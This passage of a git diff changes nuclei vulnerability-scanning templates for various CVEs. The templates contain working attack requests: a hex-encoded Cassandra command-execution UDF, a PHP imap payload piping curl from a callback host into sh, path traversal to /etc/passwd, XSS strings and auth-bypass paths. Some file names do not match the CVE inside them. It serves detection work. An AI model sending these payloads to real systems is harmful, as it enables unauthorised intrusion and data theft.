"7d000296664f0500000807000000740000005c435245415445205441424c4520746573742e7263652028636d642076617263686172205052494d415259204b455929205749544820636f6d6d656e743d27496d706f7274616e742062696f6c6f676963616c207265636f726473273b0001000000340000006400080005d82cc8cb2fc161951510" + read: 1024 + type: hex + - data: "1c030291ff34050000100700000313000002fb637265617465206f72207265706c6163652046554e4354494f4e20746573742e657865632820636d64207465787420290d0a2020202052455455524e53204e554c4c204f4e204e554c4c20494e5055540d0a2020202052455455524e5320746578740d0a202020204c414e4755414745206a6176617363726970740d0a2020202041532024240d0a202020207661722053797374656d203d204a6176612e7479706528226a6176612e6c616e672e53797374656d22293b53797374656d2e73657453656375726974794d616e61676572286e756c6c293b0d0a202020207661722065203d746869732e656e67696e652e666163746f72792e736372697074456e67696e652e6576616c2827766172206f736e616d65203d206a6176612e6c616e672e53797374656d2e67657450726f706572747928226f732e6e616d6522293b6f736e616d65203d206f736e616d652e746f4c6f7765724361736528293b7661722073706c6974203d206f736e616d652e73746172747357697468282277696e2229203f20222f6322203a20222d63223b76617220636d6450617468203d206f736e616d652e73746172747357697468282277696e2229203f2022636d6422203a202262617368223b76617220636f6d6d616e64203d2022272b636d642b27223b7661722073203d205b636d64506174682c2073706c69742c20636f6d6d616e645d3b70203d206a6176612e6c616e672e52756e74696d652e67657452756e74696d6528292e657865632873293b766172206272203d206e6577206a6176612e696f2e4275666665726564526561646572286e6577206a6176612e696f2e496e70757453747265616d52656164657228702e676574496e70757453747265616d282929293b766172207265733d22223b7768696c652028286c203d2062722e726561644c696e6528292920213d206e756c6c29207b202020207265732b3d6c3b7265732b3d6a6176612e6c616e672e53797374656d2e6c696e65536570617261746f7228293b7d27293b0d0a20202020653b0d0a2020202024243b0001000000340000006400080005d82cc8cc7ece89646c85" + read: 1024 + type: hex + - data: "51000278033505000014070000004800000030696e7365727420696e746f20746573742e72636528636d64292076616c75657328276563686f2031323331323327293b0001000000340000006400080005d82cc8cd5b810ef0b16e" + read: 1024 + type: hex + - data: "450002bff1d805000015070000003c0000002473656c65637420746573742e6578656328636d64292066726f6d20746573742e7263653b0001000000340000006400080005d82cc8cd99d444271281" + read: 1024 + type: hex + - data: "3e000218aeb50500000307000000350000001d64726f70204b455953504143452049462045584953545320746573743b0001000000340000006400080005d82cc8ca0e4fcdde8c0a" + type: hex + read: 1024 + + host: + - "{{Hostname}}" + - "{{Host}}:9042" + + matchers: + - type: word + part: raw + words: + - "123123" + +# Enhanced by mp on 2022/03/07 diff --git a/nuclei-templates/CVE-2021/cve-2021-44528.yaml b/nuclei-templates/CVE-2021/cve-2021-44528.yaml deleted file mode 100644 index d0a3ea82cb..0000000000 --- a/nuclei-templates/CVE-2021/cve-2021-44528.yaml +++ /dev/null @@ -1,37 +0,0 @@ -id: CVE-2021-44528 - -info: - name: Open Redirect in Host Authorization Middleware - author: geeknik - severity: medium - description: Specially crafted "X-Forwarded-Host" headers in combination with certain "allowed host" formats can cause the Host Authorization middleware in Action Pack to redirect users to a malicious website. - reference: - - https://seclists.org/oss-sec/2021/q4/att-160/7-0-host-authorzation-open-redirect.patch - - https://nvd.nist.gov/vuln/detail/CVE-2021-44528 - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N - cvss-score: 6.10 - cve-id: CVE-2021-44528 - cwe-id: CWE-601 - tags: cve,cve2021,redirect - -requests: - - raw: - - | - GET / HTTP/1.1 - Host: {{Hostname}} - X-Forwarded-Host: //example.com - - matchers-condition: and - matchers: - - type: regex - part: header - regex: - - '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)?(?:[a-zA-Z0-9\-_\.@]*)example\.com\/?(\/|[^.].*)?$' - - - type: status - status: - - 301 - - 302 - - 307 - - 308 diff --git a/nuclei-templates/CVE-2021/cve-2021-44529.yaml b/nuclei-templates/CVE-2021/cve-2021-44529.yaml deleted file mode 100644 index 669869e4a2..0000000000 --- a/nuclei-templates/CVE-2021/cve-2021-44529.yaml +++ /dev/null @@ -1,41 +0,0 @@ -id: CVE-2021-44529 - -info: - name: Ivanti EPM Cloud Services Appliance Code Injection - author: duty_1g,phyr3wall,Tirtha - severity: critical - description: "Ivanti EPM Cloud Services Appliance (CSA) before version 4.6.0-512 is susceptible to a code injection vulnerability because it allows an unauthenticated user to execute arbitrary code with limited permissions (nobody)." - reference: - - https://forums.ivanti.com/s/article/SA-2021-12-02 - - https://twitter.com/Dinosn/status/1505273954478530569 - - https://nvd.nist.gov/vuln/detail/CVE-2021-44529 - metadata: - shodan-query: title:"LANDesk(R) Cloud Services Appliance" - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H - cvss-score: 9.80 - cve-id: CVE-2021-44529 - cwe-id: CWE-94 - tags: cve,cve2021,ivanti,epm,csa,injection - -requests: - - raw: - - | - GET /client/index.php HTTP/1.1 - Host: {{Hostname}} - Cookie: ab=ab; c=cGhwaW5mbygpOw==; d=; e=; - - matchers-condition: and - matchers: - - type: word - part: body - words: - - "phpinfo()" - - "Cloud Services Appliance" - condition: and - - - type: status - status: - - 200 - -# Enhanced by mp on 2022/03/28 diff --git a/nuclei-templates/CVE-2021/cve-2021-44848.yaml b/nuclei-templates/CVE-2021/cve-2021-44848.yaml new file mode 100644 index 0000000000..8dc769da77 --- /dev/null +++ b/nuclei-templates/CVE-2021/cve-2021-44848.yaml @@ -0,0 +1,36 @@ +id: CVE-2021-44848 + +info: + name: Thinfinity VirtualUI User Enumeration + author: danielmofer + severity: medium + description: Thinfinity VirtualUI (before v3.0), /changePassword returns different responses for requests depending on whether the username exists. It may enumerate OS users (Administrator, Guest, etc.) + reference: + - https://github.com/cybelesoft/virtualui/issues/1 + - https://nvd.nist.gov/vuln/detail/CVE-2021-44848 + - https://www.tenable.com/cve/CVE-2021-44848 + tags: cve,cve2021,exposure,thinfinity,virtualui + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N + cvss-score: 5.30 + cve-id: CVE-2021-44848 + cwe-id: CWE-287 + +requests: + - raw: + - | + GET /changePassword?username=administrator HTTP/1.1 + Host: {{Hostname}} + + matchers-condition: and + matchers: + - type: regex + part: body + regex: + - '"rc":(.*?)' + - '"msg":"(.*?)"' + condition: and + + - type: status + status: + - 200 diff --git a/nuclei-templates/CVE-2021/cve-2021-45096.yaml b/nuclei-templates/CVE-2021/cve-2021-45096.yaml deleted file mode 100644 index b698a2abd7..0000000000 --- a/nuclei-templates/CVE-2021/cve-2021-45096.yaml +++ /dev/null @@ -1,49 +0,0 @@ -id: CVE-2018-19518 - -info: - name: PHP imap - Remote Command Execution - author: princechaddha - severity: high - description: | - University of Washington IMAP Toolkit 2007f on UNIX, as used in imap_open() in PHP and other products, launches an rsh command (by means of the imap_rimap function in c-client/imap4r1.c and the tcp_aopen function in osdep/unix/tcp_unix.c) without preventing argument injection, which might allow remote attackers to execute arbitrary OS commands if the IMAP server name is untrusted input (e.g., entered by a user of a web application) and if rsh has been replaced by a program with different argument semantics. For example, if rsh is a link to ssh (as seen on Debian and Ubuntu systems), then the attack can use an IMAP server name containing a "-oProxyCommand" argument. - reference: - - https://github.com/vulhub/vulhub/tree/master/php/CVE-2018-19518 - - https://nvd.nist.gov/vuln/detail/CVE-2018-19518 - - https://www.openwall.com/lists/oss-security/2018/11/22/3 - - https://github.com/Bo0oM/PHP_imap_open_exploit/blob/master/exploit.php - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H - cvss-score: 7.5 - cve-id: CVE-2018-19518 - cwe-id: CWE-88 - metadata: - confidence: tenative - tags: imap,dast,vulhub,cve,cve2018,rce,oast,php - -http: - - pre-condition: - - type: dsl - dsl: - - 'method == "GET"' - - payloads: - php-imap: - - "x -oProxyCommand=echo {{base64(url_encode('curl {{interactsh-url}}'))}}|base64 -d|sh}" - - fuzzing: - - part: query - fuzz: - - "{{php-imap}}" - - matchers-condition: and - matchers: - - type: word - part: interactsh_protocol - words: - - http - - - type: word - part: interactsh_request - words: - - "User-Agent: curl" -# digest: 4a0a00473045022100af7a090c8826b8f7eb0934a5a130dc05780441afce33b5e31dda44213d47691e02205499f8bad4923cabbddd841491363890751a97b823905e848b6ed457c4d2ecab:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2021/cve-2021-45232.yaml b/nuclei-templates/CVE-2021/cve-2021-45232.yaml deleted file mode 100644 index d524c6ff99..0000000000 --- a/nuclei-templates/CVE-2021/cve-2021-45232.yaml +++ /dev/null @@ -1,35 +0,0 @@ -id: CVE-2021-45232 - -info: - name: Apache APISIX Dashboard api unauth access - author: Mr-xn - severity: critical - description: In Apache APISIX Dashboard before 2.10.1, the Manager API uses two frameworks and introduces framework `droplet` on the basis of framework `gin`, all APIs and authentication middleware are developed based on framework `droplet`, but some API directly use the interface of framework `gin` thus bypassing the authentication. - reference: - - https://apisix.apache.org/zh/blog/2021/12/28/dashboard-cve-2021-45232/ - - https://github.com/pingpongcult/CVE-2021-45232 - - https://github.com/advisories/GHSA-wcxq-f256-53xp - - https://twitter.com/403Timeout/status/1475715079173976066 - - https://github.com/wuppp/cve-2021-45232-exp - tags: cve,cve2021,apache,unauth,apisix - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H - cvss-score: 9.80 - cve-id: CVE-2021-45232 - cwe-id: CWE-306 - -requests: - - method: GET - path: - - "{{RootURL}}/apisix/admin/migrate/export" - - matchers-condition: and - matchers: - - - type: word - words: - - '"Consumers":' - - - type: status - status: - - 200 diff --git a/nuclei-templates/CVE-2021/cve-2021-45380.yaml b/nuclei-templates/CVE-2021/cve-2021-45380.yaml deleted file mode 100644 index 0834ea3205..0000000000 --- a/nuclei-templates/CVE-2021/cve-2021-45380.yaml +++ /dev/null @@ -1,40 +0,0 @@ -id: CVE-2021-45380 - -info: - name: AppCMS - Reflected Cross-Site Scripting - author: pikpikcu - severity: medium - description: AppCMS 2.0.101 has a cross-site scripting vulnerability in \templates\m\inc_head.php. - reference: - - https://github.com/source-trace/appcms/issues/8 - - https://nvd.nist.gov/vuln/detail/CVE-2021-45380 - tags: cve,cve2021,appcms,xss - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N - cvss-score: 6.10 - cve-id: CVE-2021-45380 - cwe-id: CWE-79 - -requests: - - method: GET - path: - - '{{BaseURL}}/templates/m/inc_head.php?q=%22%3e%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E' - - matchers-condition: and - matchers: - - type: word - part: body - words: - - '"">' - condition: and - - - type: word - part: header - words: - - text/html - - - type: status - status: - - 200 - -# Enhanced by mp on 2022/02/28 diff --git a/nuclei-templates/CVE-2021/cve-2021-46005.yaml b/nuclei-templates/CVE-2021/cve-2021-46005.yaml deleted file mode 100644 index e11d1cdd8c..0000000000 --- a/nuclei-templates/CVE-2021/cve-2021-46005.yaml +++ /dev/null @@ -1,113 +0,0 @@ -id: CVE-2021-46005 - -info: - name: Sourcecodester Car Rental Management System 1.0 - Stored Cross-Site Scripting - author: cckuailong - severity: medium - description: Sourcecodester Car Rental Management System 1.0 is vulnerable to cross-site scripting via the vehicalorcview parameter. - reference: - - https://www.exploit-db.com/exploits/49546 - - https://nvd.nist.gov/vuln/detail/CVE-2021-46005 - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N - cvss-score: 5.4 - cve-id: CVE-2021-46005 - cwe-id: CWE-79 - tags: cve,cve2021,xss,sourcecodester,authenticated - -requests: - - raw: - - | - POST /admin/ HTTP/1.1 - Host: {{Hostname}} - Content-Type: application/x-www-form-urlencoded - Connection: close - - username={{username}}&password={{password}}&login= - - - | - POST /admin/post-avehical.php HTTP/1.1 - Host: {{Hostname}} - Content-Type: multipart/form-data; boundary=----WebKitFormBoundarypWqYipqU21aYgccv - - ------WebKitFormBoundarypWqYipqU21aYgccv - Content-Disposition: form-data; name="vehicletitle" - - Test - ------WebKitFormBoundarypWqYipqU21aYgccv - Content-Disposition: form-data; name="brandname" - - 1 - ------WebKitFormBoundarypWqYipqU21aYgccv - Content-Disposition: form-data; name="vehicalorcview" - - - ------WebKitFormBoundarypWqYipqU21aYgccv - Content-Disposition: form-data; name="priceperday" - - 500 - ------WebKitFormBoundarypWqYipqU21aYgccv - Content-Disposition: form-data; name="fueltype" - - Petrol - ------WebKitFormBoundarypWqYipqU21aYgccv - Content-Disposition: form-data; name="modelyear" - - 2022 - ------WebKitFormBoundarypWqYipqU21aYgccv - Content-Disposition: form-data; name="seatingcapacity" - - 5 - ------WebKitFormBoundarypWqYipqU21aYgccv - Content-Disposition: form-data; name="img1"; filename="test.png" - Content-Type: image/png - - - ------WebKitFormBoundarypWqYipqU21aYgccv - Content-Disposition: form-data; name="img2"; filename="test.png" - Content-Type: image/png - - - ------WebKitFormBoundarypWqYipqU21aYgccv - Content-Disposition: form-data; name="img3"; filename="test.png" - Content-Type: image/png - - - ------WebKitFormBoundarypWqYipqU21aYgccv - Content-Disposition: form-data; name="img4"; filename="test.png" - Content-Type: image/png - - - ------WebKitFormBoundarypWqYipqU21aYgccv - Content-Disposition: form-data; name="img5"; filename="" - Content-Type: application/octet-stream - - - ------WebKitFormBoundarypWqYipqU21aYgccv - Content-Disposition: form-data; name="submit" - - - ------WebKitFormBoundarypWqYipqU21aYgccv-- - - - | - GET / HTTP/1.1 - Host: {{Hostname}} - - cookie-reuse: true - matchers-condition: and - matchers: - - type: word - part: body - words: - - "" - - - type: word - part: header - words: - - text/html - - - type: status - status: - - 200 - -# Enhanced by mp on 2022/02/28 diff --git a/nuclei-templates/CVE-2021/cve-2021-46381.yaml b/nuclei-templates/CVE-2021/cve-2021-46381.yaml deleted file mode 100644 index 33770bee9e..0000000000 --- a/nuclei-templates/CVE-2021/cve-2021-46381.yaml +++ /dev/null @@ -1,29 +0,0 @@ -id: CVE-2021-46381 - -info: - name: D-Link DAP-1620 - Local File Inclusion - author: 0x_Akoko - severity: high - description: Local File Inclusion due to path traversal in D-Link DAP-1620 leads to unauthorized internal files reading [/etc/passwd] and [/etc/shadow]. - reference: - - https://drive.google.com/drive/folders/19OP09msw8l7CJ622nkvnvnt7EKun1eCG?usp=sharing - - https://www.cvedetails.com/cve/CVE-2021-46381/ - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N - cvss-score: 7.5 - cve-id: CVE-2021-46381 - cwe-id: CWE-22 - tags: cve,cve2021,dlink,lfi - -requests: - - method: POST - path: - - "{{BaseURL}}/apply.cgi" - - body: "action=do_graph_auth&graph_code=94102&html_response_message=just_login&html_response_page=../../../../../../../../../../../../../../etc/passwd&log_pass=DummyPass&login_n=admin&login_name=DummyName&tkn=634855349&tmp_log_pass=DummyPass&tmp_log_pass_auth=DummyPass" - - matchers: - - type: regex - part: body - regex: - - "root:.*:0:0:" diff --git a/nuclei-templates/CVE-2022/CVE-2022-0378.yaml b/nuclei-templates/CVE-2022/CVE-2022-0378.yaml deleted file mode 100644 index 0c129e0017..0000000000 --- a/nuclei-templates/CVE-2022/CVE-2022-0378.yaml +++ /dev/null @@ -1,47 +0,0 @@ -id: CVE-2022-0378 - -info: - name: Microweber Cross-Site Scripting - author: pikpikcu - severity: medium - description: Microweber contains a reflected cross-site scripting in Packagist microweber/microweber prior to 1.2.11. - remediation: | - Apply the latest security patch or upgrade to a version that has addressed the vulnerability. - reference: - - https://nvd.nist.gov/vuln/detail/CVE-2022-0378 - - https://github.com/microweber/microweber/commit/fc7e1a026735b93f0e0047700d08c44954fce9ce - - https://huntr.dev/bounties/529b65c0-5be7-49d4-9419-f905b8153d31 - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:L/A:N - cvss-score: 5.4 - cve-id: CVE-2022-0378 - cwe-id: CWE-79 - epss-score: 0.001 - epss-percentile: 0.41081 - cpe: cpe:2.3:a:microweber:microweber:*:*:*:*:*:*:*:* - metadata: - max-request: 1 - vendor: microweber - product: microweber - shodan-query: http.favicon.hash:780351152 - tags: cve,cve2022,microweber,xss,huntr - -http: - - method: GET - path: - - '{{BaseURL}}/module/?module=admin%2Fmodules%2Fmanage&id=test%22+onmousemove%3dalert(document.domain)+xx=%22test&from_url=x' - - matchers-condition: and - matchers: - - type: word - part: body - words: - - 'mwui_init' - - 'onmousemove="alert(document.domain)' - condition: and - - - type: status - status: - - 200 - -# digest: 4a0a00473045022073a374de7ceaffbdfd2a16e5e6062c867bc98a2d24d7fe891e630bdbe1b6768a022100f8eb1f57e3a27902c7669fe6448f13b83fdcdca373d1b05cd25ae7a9a538be77:922c64590222798bb761d5b6d8e72950 diff --git a/nuclei-templates/CVE-2022/CVE-2022-0540.yaml b/nuclei-templates/CVE-2022/CVE-2022-0540.yaml new file mode 100644 index 0000000000..21d2d6f4d3 --- /dev/null +++ b/nuclei-templates/CVE-2022/CVE-2022-0540.yaml @@ -0,0 +1,34 @@ +id: CVE-2022-0540 +info: + name: Atlassian Jira Seraph - Authentication Bypass + author: DhiyaneshDK + severity: critical + description: | + Jira Seraph allows a remote, unauthenticated attacker to bypass authentication by sending a specially crafted HTTP request. This affects Atlassian Jira Server and Data Center versions before 8.13.18, versions 8.14.0 and later before 8.20.6, and versions 8.21.0 and later before 8.22.0. This also affects Atlassian Jira Service Management Server and Data Center versions before 4.13.18, versions 4.14.0 and later before 4.20.6, and versions 4.21.0 and later before 4.22.0. + reference: + - https://blog.viettelcybersecurity.com/cve-2022-0540-authentication-bypass-in-seraph/ + - https://nvd.nist.gov/vuln/detail/CVE-2022-0540 + - https://confluence.atlassian.com/display/JIRA/Jira+Security+Advisory+2022-04-20 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.8 + cve-id: CVE-2022-0540 + cwe-id: CWE-287 + metadata: + shodan-query: http.component:"Atlassian Jira" + tags: cve,cve2022,atlassian,jira,exposure,auth-bypass +requests: + - method: GET + path: + - '{{BaseURL}}/InsightPluginShowGeneralConfiguration.jspa;' + matchers-condition: and + matchers: + - type: word + part: body + words: + - 'General Insight Configuration' + - type: status + status: + - 200 + +# Enhanced by mp on 2022/05/18 diff --git a/nuclei-templates/CVE-2022/CVE-2022-0921.yaml b/nuclei-templates/CVE-2022/CVE-2022-0921.yaml deleted file mode 100644 index cd4e13baa8..0000000000 --- a/nuclei-templates/CVE-2022/CVE-2022-0921.yaml +++ /dev/null @@ -1,57 +0,0 @@ -id: CVE-2022-0954 - -info: - name: Microweber - Cross-site Scripting - author: amit-jd - severity: medium - description: | - Multiple Stored Cross-site Scripting (XSS) Vulnerabilities in Shop's Other Settings, Shop's Autorespond E-mail Settings and Shops' Payments Methods in GitHub repository microweber/microweber prior to 1.2.11. - reference: - - https://github.com/advisories/GHSA-8c76-mxv5-w4g8 - - https://huntr.dev/bounties/b99517c0-37fc-4efa-ab1a-3591da7f4d26/ - - https://github.com/microweber/microweber/commit/955471c27e671c49e4b012e3b120b004082ac3f7 - - https://nvd.nist.gov/vuln/detail/CVE-2022-0954 - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N - cvss-score: 5.4 - cve-id: CVE-2022-0954 - cwe-id: CWE-79 - metadata: - verified: "true" - tags: cve,cve2022,xss,microweber - -requests: - - raw: - - | - POST /api/user_login HTTP/1.1 - Host: {{Hostname}} - Content-Type: application/x-www-form-urlencoded - - username={{username}}&password={{password}} - - - | - POST /api/save_option HTTP/2 - Host: {{Hostname}} - Content-Type: application/x-www-form-urlencoded; charset=UTF-8 - Referer: {{BaseURL}}/admin/view:shop/action:options - - option_key=checkout_url&option_group=shop&option_value=%22%3E%3CiMg+SrC%3D%22x%22+oNeRRor%3D%22alert(document.domain)%3B%22%3E&module=shop%2Forders%2Fsettings%2Fother - - - | - POST /module/ HTTP/2 - Host: {{Hostname}} - Content-Type: application/x-www-form-urlencoded; charset=UTF-8 - Referer: {{BaseURL}}/admin/view:shop/action:options - - module=settings%2Fsystem_settings&id=settings_admin_mw-main-module-backend-settings-admin&class=card-body+pt-3&option_group=shop%2Forders%2Fsettings%2Fother&is_system=1&style=position%3A+relative%3B - - cookie-reuse: true - req-condition: true - matchers: - - type: dsl - dsl: - - 'contains(body_2,"true")' - - contains(body_3,'\">\" placeholder=\"Use default') - - 'contains(all_headers_3,"text/html")' - - 'status_code_3==200' - condition: and diff --git a/nuclei-templates/CVE-2022/CVE-2022-1713.yaml b/nuclei-templates/CVE-2022/CVE-2022-1713.yaml new file mode 100644 index 0000000000..020db3ac09 --- /dev/null +++ b/nuclei-templates/CVE-2022/CVE-2022-1713.yaml @@ -0,0 +1,37 @@ +id: CVE-2022-1713 +info: + name: Drawio <18.0.4 - Server-Side Request Forgery + author: pikpikcu + severity: high + description: | + Drawio prior to 18.0.4 is vulnerable to server-side request forgery. An attacker can make a request as the server and read its contents. This can lead to a leak of sensitive information. + reference: + - https://huntr.dev/bounties/cad3902f-3afb-4ed2-abd0-9f96a248de11 + - https://github.com/jgraph/drawio/commit/283d41ec80ad410d68634245cf56114bc19331ee + - https://nvd.nist.gov/vuln/detail/CVE-2022-1713 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N + cvss-score: 7.5 + cve-id: CVE-2022-1713 + cwe-id: CWE-918 + metadata: + verified: true + shodan-query: http.title:"Flowchart Maker" + tags: cve,cve2022,drawio,ssrf,oss +requests: + - raw: + - | + GET /proxy?url=http%3a//0:8080/ HTTP/1.1 + Host: {{Hostname}} + matchers-condition: and + matchers: + - type: word + part: body + words: + - "Flowchart Maker & Online Diagram Software" + - type: word + part: header + words: + - "application/octet-stream" + +# Enhanced by mp on 2022/06/29 diff --git a/nuclei-templates/wordpress/CVE-2022-1756.yaml b/nuclei-templates/CVE-2022/CVE-2022-1756.yaml similarity index 75% rename from nuclei-templates/wordpress/CVE-2022-1756.yaml rename to nuclei-templates/CVE-2022/CVE-2022-1756.yaml index 68d26fc752..ef39f7d039 100644 --- a/nuclei-templates/wordpress/CVE-2022-1756.yaml +++ b/nuclei-templates/CVE-2022/CVE-2022-1756.yaml @@ -6,18 +6,21 @@ info: severity: medium description: | The Newsletter WordPress plugin before 7.4.5 does not sanitize and escape the $_SERVER['REQUEST_URI'] before echoing it back in admin pages. Although this uses addslashes, and most modern browsers automatically URLEncode requests, this is still vulnerable to Reflected XSS in older browsers such as Internet Explorer 9 or below. + impact: | + Allows attackers to inject malicious scripts into web pages viewed by users, leading to potential data theft or unauthorized actions. remediation: Fixed in version 7.4.5 reference: - https://wpscan.com/vulnerability/6ad407fe-db2b-41fb-834b-dd8c4f62b072 - https://nvd.nist.gov/vuln/detail/CVE-2022-1756 - https://wordpress.org/plugins/newsletter/ + - https://github.com/ARPSyndicate/cvemon classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N cvss-score: 6.1 cve-id: CVE-2022-1756 cwe-id: CWE-79 - epss-score: 0.00117 - epss-percentile: 0.4548 + epss-score: 0.00088 + epss-percentile: 0.36967 cpe: cpe:2.3:a:thenewsletterplugin:newsletter:*:*:*:*:*:wordpress:*:* metadata: verified: true @@ -26,7 +29,7 @@ info: product: newsletter framework: wordpress publicwww-query: "/wp-content/plugins/newsletter/" - tags: wpscan,cve,cve2022,newsletter,xss,authenticated + tags: cve,cve2022,wpscan,newsletter,xss,authenticated,thenewsletterplugin,wordpress http: - raw: @@ -46,4 +49,4 @@ http: - 'status_code == 200' - 'contains(body, "newsletter") && contains(body, ">")' condition: and -# digest: 4a0a00473045022100ec7e4be2a2ba4a4594b6be649f213d16d52695c57e72c0954c73757374890ba70220715aeb5f4853dbe80ffab53e06410028f5a9d78707d4aa976af82fbe6cd22b68:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402200fa34aa25d63a52f48de8efec62fd88252882c33f34552a8b1b1e8e8e4ac67e0022025a59cd21e162f7d7d8b8cc2f2671c0635622301e345873430933989a6170bdd:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2022/CVE-2022-21371.yaml b/nuclei-templates/CVE-2022/CVE-2022-21371.yaml deleted file mode 100644 index a3a54bb30d..0000000000 --- a/nuclei-templates/CVE-2022/CVE-2022-21371.yaml +++ /dev/null @@ -1,55 +0,0 @@ -id: CVE-2022-21371 - -info: - name: Oracle WebLogic Server Local File Inclusion - author: paradessia,narluin - severity: high - description: An easily exploitable local file inclusion vulnerability allows unauthenticated attackers with network access via HTTP to compromise Oracle WebLogic Server. Supported versions that are affected are 12.1.3.0.0, 12.2.1.3.0, 12.2.1.4.0 and 14.1.1.0.0. Successful attacks of this vulnerability can result in unauthorized and sometimes complete access to critical data. - reference: - - https://www.oracle.com/security-alerts/cpujan2022.html - - https://nvd.nist.gov/vuln/detail/CVE-2022-21371 - - https://gist.github.com/picar0jsu/f3e32939153e4ced263d3d0c79bd8786 - - http://packetstormsecurity.com/files/165736/Oracle-WebLogic-Server-14.1.1.0.0-Local-File-Inclusion.html - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N - cvss-score: 7.5 - cve-id: CVE-2022-21371 - cpe: cpe:2.3:a:oracle:weblogic_server:*:*:*:*:*:*:*:* - epss-score: 0.9693 - metadata: - max-request: 2 - tags: cve,cve2022,lfi,weblogic,oracle,packetstorm - -http: - - method: GET - raw: - - |+ - GET {{path}} HTTP/1.1 - Host: {{Hostname}} - - payloads: - path: - - .//WEB-INF/weblogic.xml - - .//WEB-INF/web.xml - - unsafe: true - stop-at-first-match: true - matchers-condition: and - matchers: - - type: dsl - dsl: - - 'contains(body, "")' - - 'contains(body, "")' - condition: or - - - type: dsl - dsl: - - 'contains(all_headers, "text/xml")' - - 'contains(all_headers, "application/xml")' - condition: or - - - type: status - status: - - 200 - -# Enhanced by mp on 2022/03/08 diff --git a/nuclei-templates/CVE-2022/CVE-2022-21500.yaml b/nuclei-templates/CVE-2022/CVE-2022-21500.yaml deleted file mode 100644 index bfd9bb4211..0000000000 --- a/nuclei-templates/CVE-2022/CVE-2022-21500.yaml +++ /dev/null @@ -1,37 +0,0 @@ -id: CVE-2022-21500 -info: - name: Oracle E-Business Suite <=12.2 - Authentication Bypass - author: 3th1c_yuk1,tess - severity: high - description: | - Oracle E-Business Suite (component: Manage Proxies) 12.1 and 12.2 are susceptible to an easily exploitable vulnerability that allows an unauthenticated attacker with network access via HTTP to compromise it by self-registering for an account. Successful attacks of this vulnerability can result in unauthorized access to critical data or complete access to all Oracle E-Business Suite accessible data. - reference: - - https://orwaatyat.medium.com/my-new-discovery-in-oracle-e-business-login-panel-that-allowed-to-access-for-all-employees-ed0ec4cad7ac - - https://twitter.com/GodfatherOrwa/status/1514720677173026816 - - https://www.oracle.com/security-alerts/alert-cve-2022-21500.html - - https://nvd.nist.gov/vuln/detail/CVE-2022-21500 - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N - cvss-score: 7.5 - cve-id: CVE-2022-21500 - metadata: - shodan-query: http.title:"Login" "X-ORACLE-DMS-ECID" 200 - verified: "true" - tags: cve,cve2022,oracle,misconfig,auth-bypass -requests: - - method: GET - path: - - '{{BaseURL}}/OA_HTML/ibeCAcpSSOReg.jsp' - matchers-condition: and - matchers: - - type: word - words: - - 'Registration' - - 'Register as individual' - - '' - condition: and - - type: status - status: - - 200 - -# Enhanced by mp on 2022/06/29 diff --git a/nuclei-templates/CVE-2022/CVE-2022-2290.yaml b/nuclei-templates/CVE-2022/CVE-2022-2290.yaml deleted file mode 100644 index 95e4ee6012..0000000000 --- a/nuclei-templates/CVE-2022/CVE-2022-2290.yaml +++ /dev/null @@ -1,42 +0,0 @@ -id: CVE-2022-2290 -info: - name: Trilium - Cross-Site Scripting - author: dbrwsky - severity: medium - description: Cross-site Scripting (XSS) - Reflected in GitHub repository zadam/trilium prior to 0.52.4, 0.53.1-beta. - reference: - - https://huntr.dev/bounties/367c5c8d-ad6f-46be-8503-06648ecf09cf/ - - https://github.com/zadam/trilium - - https://nvd.nist.gov/vuln/detail/CVE-2022-2290 - - https://github.com/zadam/trilium/commit/3faae63b849a1fabc31b823bb7af3a84d32256a7 - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N - cvss-score: 6.1 - cve-id: CVE-2022-2290 - cwe-id: CWE-79 - metadata: - shodan-query: title:"Trilium Notes" - verified: "true" - tags: cve,cve2022,xss,trilium -requests: - - method: GET - path: - - '{{BaseURL}}/custom/%3Cimg%20src=x%20onerror=alert(document.domain)%3E' - - '{{BaseURL}}/share/api/notes/%3Cimg%20src=x%20onerror=alert(document.domain)%3E' - - '{{BaseURL}}/share/api/images/%3Cimg%20src=x%20onerror=alert(document.domain)%3E/filename' - stop-at-first-match: true - matchers-condition: and - matchers: - - type: word - part: body - words: - - "No handler matched for custom " - - "Note '' not found" - condition: or - - type: word - part: header - words: - - "text/html" - - type: status - status: - - 404 diff --git a/nuclei-templates/CVE-2022/CVE-2022-22963.yaml b/nuclei-templates/CVE-2022/CVE-2022-22963.yaml deleted file mode 100644 index d1387e6883..0000000000 --- a/nuclei-templates/CVE-2022/CVE-2022-22963.yaml +++ /dev/null @@ -1,38 +0,0 @@ 